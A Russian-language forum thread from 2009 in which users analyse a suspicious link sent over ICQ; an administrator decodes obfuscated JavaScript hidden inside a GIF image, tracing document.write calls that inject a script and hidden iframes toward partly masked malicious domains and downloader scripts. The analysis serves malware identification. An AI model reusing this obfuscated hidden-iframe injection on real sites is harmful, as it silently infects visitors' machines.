Решена В аське прислали подозрительную ссылку

Тема в разделе "Анализ сайтов на наличие вирусов", создана пользователем Cameroon, 29 сен 2009.

Статус темы:
Закрыта.
  1. Cameroon
    Оффлайн

    Cameroon Активный пользователь

    Сообщения:
    80
    Симпатии:
    44
    от человека, которому я доверяю, из аськи пришла ссылка:
    как бы не спам?
     
    Последнее редактирование модератором: 29 сен 2009
  2. sergofun
    Оффлайн

    sergofun Активный пользователь

    Сообщения:
    17
    Симпатии:
    16
    Dr. Web говорит, что car.gif/Script.0 заражен JS.Click.26.
    Склеенный файл?
     
  3. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.455
    Симпатии:
    13.954
    http://www.virustotal.com/ru/analis...0c7c39095d220ff2d76dc1d8e94e5c40e6-1254210855

    Cameroon, там в картинке, еще скрипт интересный сидит.

    PHP:
    document.write(String.fromCharCode(60,115,99,114,105*****,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,32,115,114,99,61,34,106,115,46,106,115,34,62,60,47,115,99,114,105,112,116,62))
    Который означает
    PHP:
    <script type="text/javascript" src="js.js"></script>
    А js содержит:
    PHP:
    document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u*********0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')
    Который означает:
    PHP:
    <iframe src="http://***sterz.org/stats/ru1.php" style="display:none"></iframe>
    В котором содержится
    PHP:
    document.write('\u003c\u0069\u0066\u0072\u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0070\u0*****0078\u002e\u0070\u0068\u0070\u0022\u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u0064\u0069\u0073\u0070\u006c\u0061\u0079\u003a\u006e\u006f\u006e\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072\u0061\u006d\u0065\u003e')
    Который означает:
    PHP:
    <iframe src="http://pri*et2.cn/****/*** style="display:none"></iframe>
    В котором сидят два скрипта которые являются загрузчиками
    Код (Text):
    var Fuck_OFF_MAN ='';
    Fuck_OFF_MAN = '0123.......
    Китайцы жгут напалмом.
     
  4. Cameroon
    Оффлайн

    Cameroon Активный пользователь

    Сообщения:
    80
    Симпатии:
    44
    akoK, это вы о чем сейчас? О_о
     
  5. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.455
    Симпатии:
    13.954
    Cameroon, я о картинке. Вернее о ее содержимом.
     
  6. sergofun
    Оффлайн

    sergofun Активный пользователь

    Сообщения:
    17
    Симпатии:
    16
    Cameroon, car.gif помимо самой картинки содержит еще и скрипт. Надеюсь эта ссылка прояснит ситуацию: "Склеивание" файлов.
     
  7. Cameroon
    Оффлайн

    Cameroon Активный пользователь

    Сообщения:
    80
    Симпатии:
    44
    я понял :)
    мне это было непонятно...
     
Статус темы:
Закрыта.

Поделиться этой страницей